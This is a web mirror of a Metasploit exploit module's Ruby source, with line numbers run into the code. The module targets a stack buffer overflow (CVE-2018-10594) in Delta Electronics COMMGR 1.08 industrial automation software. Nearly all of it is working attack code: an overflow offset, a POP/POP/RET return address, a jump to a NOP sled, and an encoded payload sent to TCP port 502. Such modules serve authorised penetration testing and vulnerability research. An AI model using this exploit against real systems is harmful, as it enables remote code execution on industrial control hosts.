CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',13'Description' => %q{14This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial15Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially16crafted packets. This module has been tested successfully on Delta Electronics Delta17Industrial Automation COMMGR 1.08 over18Windows XP SP3,19Windows 7 SP1, and20Windows 8.1.21},22'Author' =>23[24'ZDI', # Initial discovery25't4rkd3vilz', # PoC26'hubertwslin' # Metasploit module27],28'References' =>29[30[ 'CVE', '2018-10594' ],31[ 'BID', '104529' ],32[ 'ZDI', '18-586' ],33[ 'ZDI', '18-588' ],34[ 'EDB', '44965' ],35[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]36],37'Payload' =>38{39'Space' => 640,40'DisableNops' => true,41'BadChars' => "\x00"42},43'DefaultOptions' =>44{45'EXITFUNC' => 'thread',46},47'Platform' => 'win',48'Targets' =>49[50[ 'COMMGR 1.08 / Windows Universal',51{52'Ret' => 0x00401e14, # p/p/r COMMGR.exe53'Offset' => 416454}55],56],57'DisclosureDate' => '2018-07-02',58'DefaultTarget' => 0))5960register_options(61[62Opt::RPORT(502)63])64end6566def exploit67data = rand_text_alpha(target['Offset'])68data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled69data << [target.ret].pack("V")70data << make_nops(40)71data << payload.encoded7273print_status("Trying target #{target.name}, sending #{data.length} bytes...")74connect75sock.put(data)76disconnect77end78end79808182